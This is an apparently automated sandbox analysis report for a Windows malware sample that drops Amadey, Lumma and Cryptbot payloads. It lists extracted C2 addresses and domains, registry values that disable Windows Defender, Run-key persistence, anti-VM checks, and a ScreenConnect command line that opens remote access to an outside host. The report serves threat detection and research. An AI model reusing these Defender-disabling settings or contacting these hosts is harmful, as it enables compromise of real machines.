Analysis
-
max time kernel
148s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-12-2024 23:13
Static task
static1
General
-
Target
file.exe
-
Size
2.9MB
-
MD5
8c724813b4468960543fcbcb4635f74f
-
SHA1
23693d84c1441a3edc77686c5a613f747ccff8a6
-
SHA256
4cc2d946c5c43426f509193cb5bee665f59f46c795c4da045d3b5940d660e6d4
-
SHA512
c10f32547cd5a5921fa826eb11d437887b13b75ecd6d4a284288e12498e9d5406a779fb2fa2632d38412b6310dc53fca530e59dc3b80db76165431b2cf405cfa
-
SSDEEP
49152:Zr515k/dk6Cw71eUMEdzK8Epe8C4IYilUBEhfqluQpq+K:5515k1klQ19LdzK8EpHICEc0aK
Malware Config
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
lumma
https://sordid-snaked.cyou/api
https://awake-weaves.cyou/api
https://wrathful-jammy.cyou/api
https://debonairnukk.xyz/api
https://diffuculttan.xyz/api
https://effecterectz.xyz/api
https://deafeninggeh.biz/api
https://immureprech.biz/api
Extracted
cryptbot
Signatures
-
Amadey family
-
Cryptbot family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" cd12090932.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection cd12090932.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" cd12090932.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" cd12090932.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" cd12090932.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" cd12090932.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 5840 created 1196 5840 a1740268cc.exe 21 -
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 02e4c18c72.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 02d487f7c7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a1740268cc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 02e4c18c72.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8d2b699a41.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 530b5596f6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cf68e84021.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ file.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 08d1669db1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cd12090932.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 680 powershell.exe 3744 powershell.exe 5356 powershell.exe 2056 powershell.exe 1524 powershell.exe 6692 powershell.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (98a59bd0eed9222b)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (98a59bd0eed9222b)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=gips620.top&p=8880&s=7333f63c-2cb1-4fe8-acd5-211dab881baa&k=BgIAAACkAABSU0ExAAgAAAEAAQDpOwIVy34yVx7xLDnH6rBeYx7mmiLN2yQyIYdJTxYIVHOsytxx89D0YKoH68EoEXToTuDpMmwJb%2bhrlJ3faNFTpvu7W8w3%2fxYUdeWuXWg%2bTQxXr6EWby912nykdroWfBxDx6Lmxg1gxGgRJHC8Oc96zV%2fiaqo5GlyagtszKkrbPOWW4FBVQPXhlUfH4mlFE0i0vcMxGginTYl8IjGBzr94ANeAXwajoe9Cjam2haoL%2f%2bgHMtFYBZJisALFnyX3zECpRv7vqWzNAQJYIqY6qDuC2lEbs0NtuBMSfQRW1t0ZOk7cEzuQjq72QbWf1bR8rZf%2b0t3VNSgkIUcBljvpSRK7&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAv4vUqiMJYUqShVJV5O3m5AAAAAACAAAAAAAQZgAAAAEAACAAAADtK7B16tzBgEE6LNlWox4YPwlI7nHf5ZbPp8V8oLXkAwAAAAAOgAAAAAIAACAAAAAN4oO%2fifTyTHiaGTx4c9JmvUlVN%2b9NSn648KPMQP5NR6AEAACY8TWvAeK%2bEmOyzHj5PpC9EmFvYqF3CXjTDwLMRxivWMeYJ4nuUo21p4XzCGB%2fjsZGqV999odyPp9QLs7ogtofTIHXWddeOf%2fEBn03po7ScZfuhhxVINXxZUtA11%2bN3g2eR7wYswb%2bbb7PT8mIctwNUwpLjhSRXCAu8PNIpXMBFfwiFasAfxY9rFVXpXNvlN%2boJ%2f%2fSMRGlxqmLC2LfHOIgoeSP72Ns8CLnsnPkBnfPHUCD2ZhdqIjgv5UQ%2f11J6HvBCdzXVFMgdpI4DGKN6SYBcRC3MLb58jsdSCgzm%2bvzt%2fEFhpdHKuheX561cCGidQ3kOp5CqBMnWoxl4QI4F1OdZfvCtVP1NtccIETY1QBYcdQ1ASdPEcSlq%2bcW%2fCOqMRaFTxugkadDckh82kHK37fmmKEG%2fV5dhfZKAo%2fqcXZiVir%2f3vxaMTSlgpFWKyV2pmWdiK5v6e2EqDq4%2bqcE1RNP0ODQQSu16wgQADVsEaTRIepneI5cta92QpqFDuzkITg2aqSFpospX0JImm3vvZIEb2eNofPZXtlgaRRzrkWW5C4K3wz1ctf6LRgfH2qkRAyFlk7D0N1seJu8JgHH8WsDt2z9pHW6VXLdMINdJ%2bcWlUF8nPcx9dtE1io7mfgOEkKWp0fh9HxMwg7W8QFIJQd%2fRe%2bj%2bNDuN%2bvDccvgwdnaE6V2k3eD%2bsrwBhY84s5DLlupy4Dvn47q%2fvgWeR3m6fGNHN%2bZTsD8wJbhts%2bjt50n%2f93eV4sa1QJ%2bsC8daWtY2LJtbvnkXgBfSK2ZeukK49JEy7PG1k25m87KY%2fsakJXPRRJhlIDsplvGFbRji8kJOv4VCBC1zqY7Qqzi1vMw8DaRmuGtUlizUyKocn6KO8FBFzu3YvTnd8c8THWE5wHNi7DyFbUJ%2baEzCqNFNyE%2f248Ft8c7bOKlX7SoB72U5qdNvbKyhtkcejYF61wP7vUbtutkJBMNhHnLcS%2f2LgPnF6SwH92UIs3PkGl0xlhMUm0JfCfu60HrfKuHkhSkY4gAI%2bau5fEXNjKD%2fpDMh7c5izU%2bRh3gXucc05%2bcOVQO8WuYzFjsZ5BvtyO2DbPTHVIjMoc4mz0E1efeDBdRODSkSlkF8vIOGAp3DChgDIowUVUzRUGThLFkNNMjN0%2b3sppTkxg2RDcp4m92WqNvUf9CJk8l2XVHjA6VJ8OL7Rr6z%2bGZsMZx3C3YiqmTpcwCwvc7HHHdBEw%2f%2f%2fJgj9lTFto6yqgFRiYax4mYR8VqfFLl5F39ntN8ZNXu2qi5aOnsmbgiligiWQzGBbI6XB9%2faNGuAUAy4AYkyUvhGiNOQTvm32ixnivky7bmabPL1z69kc95B41duKxV%2bCqpi4gQAWQzmg4HrW2wumowIOQDR49Emw%2bn7cl%2f3a%2bCGtOEDkSQ4pBiNimfvCeUJC9giDMCDv%2fB8q0HKkICGOdMqbak9ayt%2frVIr4TVXMfc0OM9NLoHLsdFnoFmes5HnEyrs2tueaW4bUbPgpzo2PG5D%2blDNFrgkZoa0OPQbU2VgKw17uOaBgwLbYzQxKfSOrSQcSBQ5vr7LQeujkzuD2KRra32XzCF3XAiLkAAAACYFrMF%2fgr%2fiFP%2flJhVWvn6qIo3SyjPENNjqzvVGWPQMYACCICtC%2bAHa8uX0sfz6JpALf2dFnpFbYo3urZNwSTw&c=VIRUS101&c=https%3a%2f%2ft.me%2fvirus101Screenconnect&c=PC%20RAT&c=PC%20RAT&c=&c=&c=&c=\"" ScreenConnect.ClientService.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cd12090932.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 08d1669db1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8d2b699a41.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 530b5596f6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 08d1669db1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cf68e84021.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cf68e84021.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 02e4c18c72.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 02e4c18c72.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8d2b699a41.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cd12090932.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 02d487f7c7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a1740268cc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a1740268cc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion file.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 02d487f7c7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 530b5596f6.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ApproximateSize.vbs UZAj8wc.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 42 IoCs
pid Process 2676 skotes.exe 2992 NN9Dd7c.exe 680 ga70pjP.exe 1940 INOKWGC.exe 1728 8ZVMneG.exe 2752 8ZVMneG.exe 2980 UZAj8wc.exe 6788 b0b45e7a6c.exe 2984 ScreenConnect.ClientService.exe 3280 02d487f7c7.exe 4188 ScreenConnect.WindowsClient.exe 4500 ScreenConnect.WindowsClient.exe 4688 77ce657d01.exe 5260 08d1669db1.exe 5840 a1740268cc.exe 6292 ScreenConnect.WindowsClient.exe 6452 36e225cffd.exe 2316 8904b059d8.exe 3168 7z.exe 3212 7z.exe 3260 7z.exe 3300 7z.exe 3344 7z.exe 3380 7z.exe 3424 7z.exe 3460 7z.exe 3524 in.exe 3536 77ce657d01.exe 3548 77ce657d01.exe 10348 02e4c18c72.exe 10664 1fdc12c3d0.exe 10800 8d2b699a41.exe 10980 caee26767d.exe 11072 caee26767d.exe 11224 a009087586.exe 3756 eb73c920fa.exe 6204 530b5596f6.exe 2112 cf68e84021.exe 7128 5fd6925fa4.exe 2856 1fdc12c3d0.exe 3804 cd12090932.exe 10068 Intel_PTT_EK_Recertification.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 8d2b699a41.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine file.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine a1740268cc.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 02e4c18c72.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine cd12090932.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 02d487f7c7.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 08d1669db1.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 530b5596f6.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine cf68e84021.exe -
Loads dropped DLL 64 IoCs
pid Process 3036 file.exe 2676 skotes.exe 2676 skotes.exe 376 MsiExec.exe 640 rundll32.exe 640 rundll32.exe 640 rundll32.exe 640 rundll32.exe 640 rundll32.exe 640 rundll32.exe 640 rundll32.exe 640 rundll32.exe 640 rundll32.exe 2676 skotes.exe 2676 skotes.exe 2676 skotes.exe 1728 8ZVMneG.exe 2676 skotes.exe 2676 skotes.exe 2676 skotes.exe 2208 MsiExec.exe 1612 MsiExec.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2676 skotes.exe 2676 skotes.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2984 ScreenConnect.ClientService.exe 2676 skotes.exe 2676 skotes.exe 2676 skotes.exe 2676 skotes.exe 2676 skotes.exe 2676 skotes.exe 5940 WerFault.exe 5940 WerFault.exe 5940 WerFault.exe 5940 WerFault.exe 5940 WerFault.exe 5840 a1740268cc.exe 2676 skotes.exe 2676 skotes.exe 3096 cmd.exe 3168 7z.exe 3096 cmd.exe 3212 7z.exe 3096 cmd.exe 3260 7z.exe 3096 cmd.exe 3300 7z.exe 3096 cmd.exe 3344 7z.exe 3096 cmd.exe 3380 7z.exe 3096 cmd.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features cd12090932.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" cd12090932.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\5fd6925fa4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017997001\\5fd6925fa4.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\cd12090932.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017998001\\cd12090932.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\530b5596f6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017995001\\530b5596f6.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\cf68e84021.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1017996001\\cf68e84021.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a4c2-3899.dat autoit_exe -
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800390038006100350039006200640030006500650064003900320032003200620029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\uq50gpfl.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (98a59bd0eed9222b)\uq50gpfl.newcfg ScreenConnect.ClientService.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 3036 file.exe 2676 skotes.exe 3280 02d487f7c7.exe 5260 08d1669db1.exe 5840 a1740268cc.exe 10348 02e4c18c72.exe 10800 8d2b699a41.exe 6204 530b5596f6.exe 2112 cf68e84021.exe 3804 cd12090932.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1728 set thread context of 2752 1728 8ZVMneG.exe 48 PID 4688 set thread context of 3548 4688 77ce657d01.exe 89 PID 10980 set thread context of 11072 10980 caee26767d.exe 104 PID 10664 set thread context of 2856 10664 1fdc12c3d0.exe 130 PID 10068 set thread context of 10204 10068 Intel_PTT_EK_Recertification.exe 138 -
resource yara_rule behavioral1/memory/3524-1665-0x000000013FC50000-0x00000001400E0000-memory.dmp upx -
Drops file in Program Files directory 19 IoCs
description ioc Process File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Windows.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\app.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Client.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsClient.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsAuthenticationPackage.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsCredentialProvider.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsFileManager.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.ClientService.exe msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.en-US.resources msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\system.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.Core.dll msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (98a59bd0eed9222b)\Client.Override.resources msiexec.exe -
Drops file in Windows directory 16 IoCs
description ioc Process File opened for modification C:\Windows\Installer\f76f364.msi msiexec.exe File created C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File created C:\Windows\Installer\f76f364.msi msiexec.exe File created C:\Windows\Installer\f76f365.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIF4EB.tmp msiexec.exe File created C:\Windows\Installer\wix{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}.SchedServiceConfig.rmi MsiExec.exe File opened for modification C:\Windows\Installer\f76f365.ipi msiexec.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe File created C:\Windows\Installer\f76f367.msi msiexec.exe File created C:\Windows\Tasks\skotes.job file.exe File opened for modification C:\Windows\Installer\MSIF4DA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF6FF.tmp msiexec.exe File opened for modification C:\Windows\Installer\{5EE1D23D-9DA7-E002-0FA7-D7C480BA00CD}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5940 2980 WerFault.exe 50 -
System Location Discovery: System Language Discovery 1 TTPs 44 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 36e225cffd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 77ce657d01.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1fdc12c3d0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NN9Dd7c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eb73c920fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ZVMneG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 02e4c18c72.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caee26767d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cd12090932.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ga70pjP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 77ce657d01.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1fdc12c3d0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 02d487f7c7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1740268cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 530b5596f6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5fd6925fa4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 5fd6925fa4.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 5fd6925fa4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language caee26767d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ZVMneG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZAj8wc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08d1669db1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cf68e84021.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language file.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8904b059d8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3608 powershell.exe 10584 PING.EXE 5148 powershell.exe 5436 PING.EXE -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
